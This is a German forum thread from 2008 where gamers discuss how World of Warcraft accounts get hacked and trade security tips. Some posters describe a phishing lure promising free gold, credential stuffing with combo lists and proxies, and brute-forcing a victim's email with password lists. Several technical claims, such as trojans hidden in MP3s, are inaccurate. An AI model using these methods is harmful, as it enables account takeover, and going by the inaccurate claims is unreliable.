# Accounthack - aber wie?



## Maelinda (4. Februar 2008)

Da in meinem bekanntenkreis (raid, gilde, freunde) immer wieder leute gehackt werden, hab ich mal ein wenig nachgefragt, was sie glauben, wie sie gehackt wurden. Da das aber nicht übermäßig viele sind und ich schon ganz gern wissen würde, wie die hacker das machen, möchte ich hier auch noch fragen, was ihr denkt oder wie es euch passiert ist.

Ich bitte euch ehrlich zu sein und hoffe auf zahlreiche antworten 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Um es euch ein wenig zu erleichtern hier noch ein paar fragen von mir:

- verwendet ihr eine firewall (welche?)
- verwendet ihr eine antivirus software (welche?)
- nutzt ihr filesharingprogramme (welche?)
- habt ihr eine "dubiose" seite besucht in letzter zeit? (ob absichtlich oder nicht)
- welchen internetbrowser verwendet ihr

und was euch sonst noch so einfällt 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Firé_Loki (4. Februar 2008)

Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 dumm ??? das beantwortet dir niemand wer eröfnet so ein forum das hört sich so an asl ob du hacken willst oO wie macht man das pfff was das für ne frage omfg mimimi  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 

LÖSCHT DEN TRHEAD !!!!!!!!! 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Devilyn (4. Februar 2008)

pah is mir noch nie pasiert^^

naja wer will auch meine lowie chars haben^^

denke mal die meisten fallen auf solche phishing mails rein(richtig geschrieben?^^)

halt mit seltsammen beta invites etc. oder kaufen gold und lassen sich power lvln^^


----------



## Navyraiser (4. Februar 2008)

alsoo ich war ca. n halbes jahr in der underground szene hab zwar keine wow accounts gehackt aber naja..eins vorweg wenn dich wirklich jemand hacken will denn schafft derjenige es auch. in den meisten fällen wird es durch trojaner gemacht das sind kleinste datein ca. 300kb groß diese stecken sie in große datein wie z.b. mp3s bieten diese als download an.. du lädst diese runter klickst auf den mp3 (trojaner) und du bist hacked. der jenige der den trojaner on gestellt hat hat vollen zugriff auf dein pc kann sehen was du schreibst (keylogger) kann datein von deinem pc laden datein auf dein pc mache z.b. neue viren etc. und sonmit kann derjenige auch ganz leicht die wow daten "besorgen". ich will jetzt kein roman schreiben deswegen geb ich dir jetzt ein paar tipps.. firewall: windows firewall reicht antivir: ich benutze antivir reicht vollkommen damit scannst du deine dateien die du dir geloadet hast bevor du diese nur anklickst filesharing: nicht sehr ratsam falls ja pass auf was du loadest und scann die datein bevor du diese benutzt. internetbrwoser: is egal nach deiner wahl. das aller wichtigste ist geh auf keine seiten die dir nicht vertraunswürdig erscheinen lad keine datein herunter die dir nicht vertraunswürdig erscheinen. leute die dich einfach bei icq adden und dir datein senden ..NICHT anehmen ganz klar. zum schluss nochmal pass auf wo du dich im www bewegst und denk dran wenn jemand dich hacken will schafft derjenige es auch. 

rechtschreibfehler könnt ihr behalten 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## cazimir (4. Februar 2008)

Es gibt genug Sicherheitslücken in Windows und Co., sodass ich unbemerkt Keylogger installieren lassen. Die meisten Betreiber der Seiten wissen noch nicht ein mal, dass sie solch einen Keylogger verbreiten. Du selber merkst es auch nicht, und es gibt so viele Varianten von Trojaner/Logger, dass die Antivirensoftwareherstellen nie alle erkennen können. Von daher GL HF xD

Ich selber benutze VirtualPC und emuliere meinen Rechner, mit den ich surfe und chatte. So hab ich wenigstens ein bisschen Sicherheit, aber sicher bist du nie.

Ich will garnicht wissen, wieviel Attacken täglich auf wow-europe.com und buffed verübt werden, nur weil irgendwelche Chinesen ihren Keylogger einschleusen wollen...

Ach ja ich benutze den Firefox und hab das Addon NoScript dabei.


----------



## Navyraiser (4. Februar 2008)

achja noch was benutze überall andere passwörter. wenn jemand ne stumpfe myqsl seite hacked wo du registriert bist und da die selben login daten benutzt...


----------



## Lafayette (4. Februar 2008)

Hier ne kleine How to fürs Acc Hacken:

1. Einen Acc Besitzer nach den Login Daten seines Acc fragen
2.in die Acc Verwaltung gehen und Passwort ändern
3. Spaß haben

Ansonsten gutes Antiviren Prog benutzen und nich alles anklicken, wo im www "klick me" draufsteht. Ich nutze btw Kaspersky AV und Spybot S&D


----------



## Scárfáce123 (4. Februar 2008)

Navyraiser schrieb:


> alsoo ich war ca. n halbes jahr in der underground szene hab zwar keine wow accounts gehackt aber naja..eins vorweg wenn dich wirklich jemand hacken will denn schafft derjenige es auch. in den meisten fällen wird es durch trojaner gemacht das sind kleinste datein ca. 300kb groß diese stecken sie in große datein wie z.b. mp3s bieten diese als download an.. du lädst diese runter klickst auf den mp3 (trojaner) *und du bist hacked. *
> 
> rechtschreibfehler könnt ihr behalten
> 
> ...



allein dieses und du bist hacked sagt alles aus was du über hacken weisst Mr. Untergrundszene rofl

zum thema: einen keylogger/trojaner bekommt man nicht sondern man holt ihn sich das heisst egal was es is selbst schuld kein mitleid 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 Firewall/antivirus Programme kosten teilweise weniger als die wow abo kosten wer sich sowas nicht zu legt und dann heult sein account wurde "gehacket" braucht sich dann nich wundern


----------



## Karmon (4. Februar 2008)

ich versteh nich wie leute überhaupt so besessen sein könn, viren zu entwickeln?
bringen einem doch  sowieso nix... na kla... irgend n trojaner um daten auzuspähen, aber es gibt ja auch viren die den pc einfach nur zerstören oder chaos anrichten... da kannste ja noch nich mal das dumme gesicht sehn von dem denns erwischt hat...
naja, mir solls egal sein, ich hab nen mac^^


----------



## SixNight (4. Februar 2008)

Mein acc wurde auch ma gehackt mit nem gut eqipten deff warri .. naja bevor er was löschen konnte hab ich den **** ausem game gekickt  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## cazimir (4. Februar 2008)

Scárfáce123 schrieb:


> ... einen keylogger/trojaner bekommt man nicht sondern man holt ihn sich ...


hmmm wie hies noch einmal dieser Trojaner der sich innerhalb von 3 Tagen um die halbe Welt gefressen hat und dann ist der Rechner regrlmäßig runtergefahren(wenn man einen Dienst nicht abgestellt hat)? Also ich finde eine Internetverbindung zu haben ist nicht holen... Aber gut, das ist nur eine ausnahme von den etlichen Infektionen die zum großteil Eigenverschulden sind.

@Karmon
Emailaddressen und Bankverbindungen bringen gutes Geld. Auch das Kauf/Surfverhalten der User zu protokollieren gibt Geld. Somit fügen die dir Schaden zu, ohne dass du es merkst.


----------



## Lafayette (4. Februar 2008)

Naja manche bzw die meisten Leute sind einfach die geborenen "Opfer", da wird jeder Müll auf die Platte geholt oder installiert. Dann wird in den Browsereinstellungen alles aktiviert usw.. 

Aber solange niemand daraus lernt, werden die selbsternannten Hacker immer bekommen,was sie wollen... 

so long


----------



## jeNoova (4. Februar 2008)

Okay ich bin ganz offen und ehrlich zu dir,

habe früher mit einem Kumpel zusammen mal j4f WoW Accs gehackt ( Auch nichts damit gemacht, wollten nur gucken wie leicht es ist! ) Das ganze haben wir über eine phishing Seite gemacht und es gibt wirklich genug Idioten die darauf reinfallen, hier im Forum war letzt jemand der eine Phishing Seite gepostet hat, 2min. später war ein Thread eines Users auf der fragte wie er seinen acc wiederbekäme, der nähmlich gehackt war, da er auf die Seite geklickt hat und dort seine Acc Daten eingegeben hat.


Wir hatten z.B den Trick benutzt das wir durch einen Bug im WoW System angeblich dem jenigen der seine Daten dort eingibt 5k Gold geben würde.

Also gibt viele Idioten die auf sowas reinfallen, aber jeder hat seinen Acc unversehrt wieder bekommen 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 Aber ich hoffe, das war den betroffenen eine Lehre 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



MfG


----------



## Shadlight (4. Februar 2008)

jeNoova schrieb:


> Okay ich bin ganz offen und ehrlich zu dir,
> 
> habe früher mit einem Kumpel zusammen mal j4f WoW Accs gehackt ( Auch nichts damit gemacht, wollten nur gucken wie leicht es ist! ) Das ganze haben wir über eine phishing Seite gemacht und es gibt wirklich genug Idioten die darauf reinfallen, hier im Forum war letzt jemand der eine Phishing Seite gepostet hat, 2min. später war ein Thread eines Users auf der fragte wie er seinen acc wiederbekäme, der nähmlich gehackt war, da er auf die Seite geklickt hat und dort seine Acc Daten eingegeben hat.
> Wir hatten z.B den Trick benutzt das wir durch einen Bug im WoW System angeblich dem jenigen der seine Daten dort eingibt 5k Gold geben würde.
> ...



du HÖRST gebannt!  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Scárfáce123 (4. Februar 2008)

cazimir schrieb:


> hmmm wie hies noch einmal dieser Trojaner der sich innerhalb von 3 Tagen um die halbe Welt gefressen hat und dann ist der Rechner regrlmäßig runtergefahren(wenn man einen Dienst nicht abgestellt hat)? Also ich finde eine Internetverbindung zu haben ist nicht holen... Aber gut, das ist nur eine ausnahme von den etlichen Infektionen die zum großteil Eigenverschulden sind.
> 
> @Karmon
> Emailaddressen und Bankverbindungen bringen gutes Geld. Auch das Kauf/Surfverhalten der User zu protokollieren gibt Geld. Somit fügen die dir Schaden zu, ohne dass du es merkst.


das war ein virus aber ok sherlock 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 der auch mit jedem guten antivirus programm / firewall nach update abwehrbar war


----------



## jeNoova (4. Februar 2008)

Warum denn?

Haben ja mit den Accs nicht weiter was gemacht 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Shadlight (4. Februar 2008)

jeNoova schrieb:


> Warum denn?
> 
> Haben ja mit den Accs nicht weiter was gemacht
> 
> ...



LOL das is trotzdem illegal  O_o


----------



## jeNoova (4. Februar 2008)

> hmmm wie hies noch einmal dieser Trojaner der sich innerhalb von 3 Tagen um die halbe Welt gefressen hat und dann ist der Rechner regrlmäßig runtergefahren(wenn man einen Dienst nicht abgestellt hat)? Also ich finde eine Internetverbindung zu haben ist nicht holen... Aber gut, das ist nur eine ausnahme von den etlichen Infektionen die zum großteil Eigenverschulden sind.
> 
> @Karmon
> Emailaddressen und Bankverbindungen bringen gutes Geld. Auch das Kauf/Surfverhalten der User zu protokollieren gibt Geld. Somit fügen die dir Schaden zu, ohne dass du es merkst.




Rätselraten!!^^

Es war auch kein Virus es war ein Wurm  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Scárfáce123 (4. Februar 2008)

jeNoova schrieb:


> Rätselraten!!^^
> 
> Es war auch kein Virus es war ein Wurm
> 
> ...


Rofl ja hast recht aber zum thema illegal beim phishing kommt mir nur wiede rin den sinn selbst schuld kein mitleid, wenn dich im RL einer nach deinen bankdaten fragst sagst doch auch nein aber im netz sind die leute ja vertrauenswürdiger


----------



## Kabuumm_Azshara (4. Februar 2008)

Hacken allein is ja nichts schlimmes, nur die meisten Leute wissen nichtmal, dass es da auch noch cracken gibt... Und cracken is eben das, was Schaden verursacht, nicht hacken.

Ich selber wurde gefühlte 3 mal gehackt. Strafe genug 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Thorat (4. Februar 2008)

Firé_Loki schrieb:


> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
> 
> 
> dumm ??? das beantwortet dir niemand wer eröfnet so ein forum das hört sich so an asl ob du hacken willst oO wie macht man das pfff was das für ne frage omfg mimimi
> ...



rofl, Hoffentlich holt dich gleich das gelbe Auto... Wenn du weist was ich meine...


----------



## Shadlight (4. Februar 2008)

Kabuumm_Azshara schrieb:


> Hacken allein is ja nichts schlimmes, nur die meisten Leute wissen nichtmal, dass es da auch noch cracken gibt... Und cracken is eben das, was Schaden verursacht, nicht hacken.
> 
> Ich selber wurde gefühlte 3 mal gehackt. Strafe genug
> 
> ...



was ist cracken?


----------



## jeNoova (4. Februar 2008)

achja @Karmon

Die Viren die einfach nur gecodet werden um Rechner völlig zu plätten, werde einfach nur gecodet um coding skill zu beweisen.

Die Coder verbreiten diese Viren ja auch meist nie selber, sie stellen sie ins Netz damit andere sehen können wie Super geil die Leute coden können und manch einer lädt sich den Virus dann runter und verbreitet ihn.

@Shadlight

Joa hast Recht, ist gegen die EULA von Blizz, aber was willst du machen? 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## jeNoova (4. Februar 2008)

Achja cracken ist das manipulieren bestimmter Programme oder Dienste um sich daraus selber einen Vorteil zu verschaffen.


----------



## Shadlight (4. Februar 2008)

jeNoova schrieb:


> achja @Karmon
> 
> Die Viren die einfach nur gecodet werden um Rechner völlig zu plätten, werde einfach nur gecodet um coding skill zu beweisen.
> 
> ...



Es ganz einfach sein LASSEN ?! ( 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 )


----------



## jeNoova (4. Februar 2008)

Ich meinte damit was du machen willst^.^

Das war ne einmalige Aktion um zu sehen wie blöd manche Leute sind, wie gesagt haben die Accs auch wiedergegeben.


----------



## Snowman_the_cool (4. Februar 2008)

einen acc zu hacken ist leider zu einfach du kannst dir zum beispiel schon beim download eines addons einen trojaner laden der dein key mit schreibt ( was mir selbst passiert ist ) 
2. wen der hacker sich besser auskennt und das professionell macht und damit geld verdient durch verkauf deienr items und dem gold dann kann er sich auf die blizz datenbank hacken da dein profil rauslesen kann und schon hat er es ist kompliziert aber auch erfolgreicher 
aber meistens werden acc durch trojaner gehackt


----------



## Scárfáce123 (4. Februar 2008)

jeNoova schrieb:


> Ich meinte damit was du machen willst^.^
> 
> Das war ne einmalige Aktion um zu sehen wie blöd manche Leute sind, wie gesagt haben die Accs auch wiedergegeben.


er is halt das typische opfer für solche seiten ^^

ja den login zu knacken is herrlich schwer wetten mit AD einer combo liste und 300 anos hab ich über 20 funktioniernde accounts in 15 minuten -.-


----------



## Shadlight (4. Februar 2008)

jeNoova schrieb:


> Ich meinte damit was du machen willst^.^
> 
> Das war ne einmalige Aktion um zu sehen wie blöd manche Leute sind, wie gesagt haben die Accs auch wiedergegeben.



hätte ich jetz auch gesagt  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Rungholt (4. Februar 2008)

Ursprünglich sind diese Viren Trojaner etc... ja ausschließlich als Spys entwickelt worden! Geheimdienste ham mit angefangen...  und seit die ursprünglichen Codes raus sind, macht sich halt jeder ran! Sie dienten eigentlich nur dem Zweck andere Nutzer im I-net zu Spy´n und Informationen zu sammeln! Später erst dazu komplette Systeme lahmzulegen!

Du wirst nie die Chance haben, mit keinem Programm, dich 100% vor schützen zu können! Denn Windows allein schon stellt diese Schlupflöcher (Svhhost.exe und konsorten sind alleine schon trojaner da sie ständig mit dem Microsoft servern kommunizieren) , da ja auch fast alle es nutzen die beste quelle für int-spys. Willst dich 100 pro schützen dann nimm win 95SE und geh bloß ned ans Netz!!!


----------



## Shadlight (4. Februar 2008)

Rungholt schrieb:


> Ursprünglich sind diese Viren Trojaner etc... ja ausschließlich als Spys entwickelt worden! Geheimdienste ham mit angefangen...  und seit die ursprünglichen Codes raus sind, macht sich halt jeder ran! Sie dienten eigentlich nur dem Zweck andere Nutzer im I-net zu Spy´n und Informationen zu sammeln! Später erst dazu komplette Systeme lahmzulegen!
> 
> Du wirst nie die Chance haben, mit keinem Programm, dich 100% vor schützen zu können! Denn Windows allein schon stellt diese Schlupflöcher (Svhhost.exe und konsorten sind alleine schon trojaner da sie ständig mit dem Microsoft servern kommunizieren) , da ja auch fast alle es nutzen die beste quelle für int-spys. Willst dich 100 pro schützen dann nimm win 95SE und geh bloß ned ans Netz!!!



omg da kennen sich aber ein paar aus  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Snowman_the_cool (4. Februar 2008)

ist besser zu wissen wen man tagtäglich im netz unterwegs ist so kann man sich auch besser schützen 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Scárfáce123 (4. Februar 2008)

Shadlight schrieb:


> omg da kennen sich aber ein paar aus
> 
> 
> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
> ...


bald alle smilies durch ?


----------



## Rungholt (4. Februar 2008)

Shadlight schrieb:


> omg da kennen sich aber ein paar aus
> 
> 
> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
> ...



Wer sich vor etwas schützen will sammelt auch informationen drüber^^ *nech


----------



## Teran Fethril (4. Februar 2008)

E-Mail Adresse zu dem User finden, den du Hacken willst.

Meistens ist der Charname mindestens irgendwo auch eine E-Mail Adresse. Dann den E-Mail Provider mit Passwortlisten bombardieren.

In den meisten E-Mail Accounts werden Login-Daten aufbewahrt.

Gruß, Teran


----------



## Rungholt (4. Februar 2008)

Wer den Accountnamen nach der E-mail Addy erstellt hats oooch kaum anders verdient^^ Jeder Provider warnt davor..... und jede einschlägige I-net Site! 

genauso sollte man für jeden ACC nen anderes PW haben, und dieses wöchentlich ändern^^


----------



## Shadlight (4. Februar 2008)

Scárfáce123 schrieb:


> bald alle smilies durch ?



NÖ da fehlen noch ein paar   


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Einsam (4. Februar 2008)

jeNoova schrieb:


> achja @Karmon
> 
> Die Viren die einfach nur gecodet werden um Rechner völlig zu plätten, werde einfach nur gecodet um coding skill zu beweisen.
> 
> ...



nicht gantz.... man kan damit geld verdienen!
auch einer firma ihre fehler unter die nase reiben (die fehler ihres system´s) kan geld einbringen

und damit ich hir auch meinen sehnff dazugebe, leute die gehackt werden haben es meist auch verdient... eissturm hat ihre server mitlerweile auf so einem hohen niv. das es unmöglich von dieser seite aus weiter gehen könnte
es giebt aber ein paar schwachstellen die die user selbst verursachen:

+gleicher benutzerlogin wie charname im spiel
+gekaufter wow accound
+antworten falscher emails
+versuchen einen privat-server zum laufen zu bringen und so dumm zu sein gleichzeitig auf den richtigen servern einzuloggen!
+die sicherheit auf dem eigenen pc vernachläsigen

usw

hf gl

einsam

ps.: es sind immer die gleichen die sumsen... ich wurde gehackt *heul* *wimer*..... arr ihr seit nicht zu belehren


----------



## Mace (4. Februar 2008)

sone umfrage gabs von zam schonmal aber vertraulich per pm hier offen gehts keinem was an Oo


----------



## Rungholt (4. Februar 2008)

Ich glaube schon das sowas alle was angeht.... da solche Geschichten auch alle betreffen( auch die die es so noch ned erwischt hat)
! Zeit und Arbeit innen 70er gesteckt, auf einmal isser wech??? Da will man ja auch wissen warum oder?

Also dem thread geb ich nen +++ weil er wichtige Infos für Leute bietet die sich mit dem thema ned so auskennen und man hier erfahren kann wo auch nen eigener fehler lag oder die Ursache für war!!!


----------



## Rungholt (4. Februar 2008)

bekommst Prozente??? also das ja ma der Hammer... unterstützt nen Hack!? -.- dein Bier.... bist meldet... kannst von ausgehen^^

meine Herren^^


----------



## Saran (4. Februar 2008)

Jup, need  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Salac (4. Februar 2008)

Navyraiser schrieb:


> alsoo ich war ca. n halbes jahr in der underground szene hab zwar keine wow accounts gehackt aber naja..eins vorweg wenn dich wirklich jemand hacken will denn schafft derjenige es auch. in den meisten fällen wird es durch trojaner gemacht das sind kleinste datein ca. 300kb groß diese stecken sie in große datein wie z.b. mp3s bieten diese als download an.. du lädst diese runter klickst auf den mp3 (trojaner) und du bist hacked. der jenige der den trojaner on gestellt hat hat vollen zugriff auf dein pc kann sehen was du schreibst (keylogger) kann datein von deinem pc laden datein auf dein pc mache z.b. neue viren etc. und sonmit kann derjenige auch ganz leicht die wow daten "besorgen". ich will jetzt kein roman schreiben deswegen geb ich dir jetzt ein paar tipps.. firewall: windows firewall reicht antivir: ich benutze antivir reicht vollkommen damit scannst du deine dateien die du dir geloadet hast bevor du diese nur anklickst filesharing: nicht sehr ratsam falls ja pass auf was du loadest und scann die datein bevor du diese benutzt. internetbrwoser: is egal nach deiner wahl. das aller wichtigste ist geh auf keine seiten die dir nicht vertraunswürdig erscheinen lad keine datein herunter die dir nicht vertraunswürdig erscheinen. leute die dich einfach bei icq adden und dir datein senden ..NICHT anehmen ganz klar. zum schluss nochmal pass auf wo du dich im www bewegst und denk dran wenn jemand dich hacken will schafft derjenige es auch.
> 
> rechtschreibfehler könnt ihr behalten
> 
> ...




Antivir reicht also vollkommen? 
Du super Underground-1337-Imba-zomfg-Hacker solltest wissen das Antivir nicht Clusterclutch suchen kann bzw. diese nicht in der Datenbank von Antivir sind.
Daher wird Dir jeder sagen der nur ein bisschen Ahnung hat das Du Antivir in die Tonne tretten kannst und in diesem Fall lieber auf Kaspersky umsteigen solltest.

Desweiteren ist es nicht möglich eine ausführbare Datei, z.B. einen Trojaner, an eine MP3 einfach anzuhängen, da es zwei vollkommen verschiedene Dateiformate sind. Bzw das dieser mit dem abspielen der MP3 ausgeführt wird.


Aber sach ma nen schönen Gruß in die Underground Szene!


Salac

P.S. Wenn Du wissen willst warum alle Scriptkiddy zu Dir sagen schreib mir ne PM.


----------



## Rungholt (4. Februar 2008)

@ SARAN

Doch bist.... kenn ich keine Gnade -.-  Wie würdest Du reagieren wenn einer deinen ACC hackt? Mir ist es es egal ob du es anpreist oder selber tust! Hoffe nur das auch deine Ip gebannt wird. Kostest immerhin jedem Gamer knapp 40 Euro für nen neuen ACC mit dem mist! Darunter welche die gar Freunschaften knüpfen via WOW!!!


----------



## Saran (4. Februar 2008)

Hoffe ich auch, dafür hab ichs gemacht. Und wenn du Leute die du ingame kennst als Freunde betrachtest, dann würde es dir wirklich recht gut tun, wenn dein Acc gehackt werden würde, denn das ist schon krankhaft.


----------



## Rungholt (4. Februar 2008)

Die meisten Leute die Ingame meine Freunde sind sind es auch zum Teil RL..... weil alleine 7 wohnen in meiner nähe!!! von daher^^ 3 neben mir :-) 

Wenn Du von wech willst machn acc platt und geh tanzen oder so^^


----------



## Saran (4. Februar 2008)

Acc ist platt, Herr Oberschlau


----------



## Rungholt (4. Februar 2008)

Ohhhh weia deiner etwa??? man da tut mir jetzt leid.... *lach 

Neeee, tut mir echt leid für die die mit dir ihren spass hatten -.- 
meine fres.. was wollt ihr mit dem mist erreichen???


----------



## Saran (4. Februar 2008)

Slob?!
Schonmal was von Acc einfrieren gehört? Soll gegen Langeweile beim gamen helfen und beschehrt dir 13€ im Monat.


----------



## Rungholt (4. Februar 2008)

Nur hab keine langeweile beim gamen... ist wohl DER unterschied und fürn nen soooo grossen Chat in dem man mehr tut als chatten zahl ich gern 13 Euro monatlich^^


----------



## Panasori (4. Februar 2008)

lol euer dialog gefällt mir..nur weiter so =)


----------



## Rungholt (4. Februar 2008)

Ok.... glaub dit Ding hier gehört langsam Closed... das bringt nix!!! 

Allen die das lesen bleibt nur ein Tip: Don´t klick any Link from such topics!!!


----------



## GrantelBart (4. Februar 2008)

Wie kann man nur so eine scheiße hier rein schreiben -.- ?


----------



## Rungholt (4. Februar 2008)

loooooooooooooooooooooool, aber is doch so immerhin wird hier ACC- Hack angepriesen............. -.-


----------



## Equality89 (4. Februar 2008)

Maelinda schrieb:


> Da in meinem bekanntenkreis (raid, gilde, freunde) immer wieder leute gehackt werden, hab ich mal ein wenig nachgefragt, was sie glauben, wie sie gehackt wurden. Da das aber nicht übermäßig viele sind und ich schon ganz gern wissen würde, wie die hacker das machen, möchte ich hier auch noch fragen, was ihr denkt oder wie es euch passiert ist.
> 
> Ich bitte euch ehrlich zu sein und hoffe auf zahlreiche antworten
> 
> ...





Einen wow account zu hacken kann stunden aber auch monate dauern, sobald es der Fall ist das wer ein Programm benutzt... Das meiste Hacken kommt durch Keylogger auf diversen Homepages oder sonst was.. 

Man kann sich also sicher sein.. wessen account gehackt wurde ist selber schuld.. deine freunde waren bestimmt auf ner porno page was weiß ich ganz einfach selber schuld


----------



## Schamll (4. Februar 2008)

/closed bitte sowas is echt dumm wer hierdrauf ne antwort gibt als nächstes ist der dran


----------



## Makhral (4. Februar 2008)

1. danke an alle "ro0xxor-1337er" hier, hat mir echt den abend versüßt...
    einfach nur zum brüllen euer "fachwissen".
2. schonmal ein ofizielles "bye bye" an diejenigen, die solche methoden   
    gelobt, angepriesen oder verlinkt haben, sowie an die, die damit   
    geprahlt haben zu cracken/gecracked zu haben. report 4tw. threadersteller eingeschlossen
3. "hacken" meint, internetseiten/datenbanken/whatever im auftrag ihrer 
    betreiber/ersteller mit "unschädlichen" programmen auf sicherheit 
    gegenüber angriffen von außen zu prüfen, "cracken" dagegen ist das 
    verwenden solcher programme mit dem ziel, schaden irgendwelcher art  
    anzurichten.
4. wie gesagt, kaspersky (bietet autoupdate) und spybot SD nutzen, nicht
   alles anklicken, dateien vor dem lokalen ausführen prüfen, für ALLES wo 
   man angemeldet ist verschiedene accountnamen und passwörter nutzen 
   und auf jeden fall PHYSISCH ( das mit papier und stift, ihr kennt es 
   vielleicht noch..) aufzeichnen und SICHER aufbewahren, NICHT als datei 
   auf dem rechner, keine dateien von unbekannter/zweifelhafter herkunft 
   über messengerdienste(MSN, ICQ) annehmen und ganz wichtig: KOPF 
   EINSCHALTEN BEIM SURFEN verdammt nochmal...

in diesem sinne...
SAFER SE.X ist ja bekanntlich "out" bei der sog. "NETGENERATION", dann betreibt wenigsten "SAFER SURF" und so ein mist müsste garnicht erst webspace bei Buffed.de fressen.

ansonsten ohne worte, kkthxbye


----------



## Salac (4. Februar 2008)

100% /sign @ Makhral

Kauft euch nen anständigen Router. Lernt etwas mit FreeBSD umzugehen, setzt ihn anständig auf. Zum Schluss noch ein paar IP Tables und der Käse ist gegessen und es passiert sicher nichts.
Denn 99,9% aller "Hacker" aka Scriptkiddy wie z.B. Navyraiser. können ein Shell nicht von einer CMD Eingabeaufforderung unterscheiden.


----------



## Occasus (4. Februar 2008)

Maelinda schrieb:


> - verwendet ihr eine firewall (welche?)
> - verwendet ihr eine antivirus software (welche?)
> - nutzt ihr filesharingprogramme (welche?)
> - habt ihr eine "dubiose" seite besucht in letzter zeit? (ob absichtlich oder nicht)
> ...



Genau darum werden Menschen gehackt. Sie geben Informationen über sich Preis.
Willst du ein HowTo haben?
Das findest du hier sicher nicht


----------



## Spochtl (4. Februar 2008)

Ich finde diesen Thread ja sooooooo witzig 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Was hier für tolle Theorien kommen, WoW Addons die einen Keylogger beinhalten, das Viren von Geheimdiensten erfunden worden, echt alles lustig 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Macht weiter, ich will noch etwas zu lachen haben 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Zum Thema Viren: http://de.wikipedia.org/wiki/Computervirus - erst lesen dann posten 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Accountklau findet zwar oft mittels Schadsoftware statt (Spyware, Trojaner etc.), aber auch viele Leute speichern Ihre Mails nur Online beim Mail ISP seines Vertrauens (web.de, freenet und co.) und dort dann auch sämtliche Anmeldedaten von A wie Amazon bis W wie WoW (zu Z fällt mir nix ein 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 ). Durch ein mehr als dämliches Passwörter wie z.B. schokolade sind diese Mailaccounts auch schnell geknackt und damit alle Accounts bei jedem Service den man nutzt.

Brute Force Angriffe auf Accounts sind aussichtslos, wer das versucht hat viel Zeit. Außer Ihr habt verdammt schlechte Logindaten.

Alles andere ist Schwachsinn.
Zieht euch keine Raubkopien auf euren Rechner (die Cracks und Keygens enthalten oft mehr als man denkt), deaktiviert eure Dienste ( http://www.dingens.org/ ), erstellt euch einen normalen Benutzeraccount und arbeitet nicht als Computeradmin und schaltet nen Router vor eure Rechner, verwendet Brain 1.0 und die Chance das Ihr euch was einfangt ist dann 0% .
Firewalls sind unnütz, auf milw0rm, Astalavista und Packetstorm Security findet Ihr genug Papers wie man die Firewall umgeht. Virescanner erkennen erkennen vielleicht noch 20% der Viren die im Umlauf sind. Jede Stunde kommen 1000 neue Viren bei den Herstellern an, die kommen kaum noch nach. Die Signaturen sind schon veraltet wenn man Sie runterlädt, die Polymorphen Viren erkennt kein Virenscanner mehr.
Der CCC hat schonmal vor 2 Jahren ein schönen Vortrag gemacht darüber: 
http://chaosradio.ccc.de/23c3_m4v_1381.html

So, bringt mal neue lustige Theorien über Account Hacking. Ich will mehr lustige Sachen lesen.


----------



## Einsam (4. Februar 2008)

Salac schrieb:


> Antivir reicht also vollkommen?
> Du super Underground-1337-Imba-zomfg-Hacker solltest wissen das Antivir nicht Clusterclutch suchen kann bzw. diese nicht in der Datenbank von Antivir sind.
> Daher wird Dir jeder sagen der nur ein bisschen Ahnung hat das Du Antivir in die Tonne tretten kannst und in diesem Fall lieber auf Kaspersky umsteigen solltest.
> 
> ...




geil du hasts auf den punkt getroffen dazu wolte ich bersönlich nichts schreiben.... der arme weis warscheinlich nicht mal warum 2 + vor dem c stehen ^^ oder sonst was


----------



## lape (5. Februar 2008)

Karmon schrieb:


> ich versteh nich wie leute überhaupt so besessen sein könn, viren zu entwickeln?
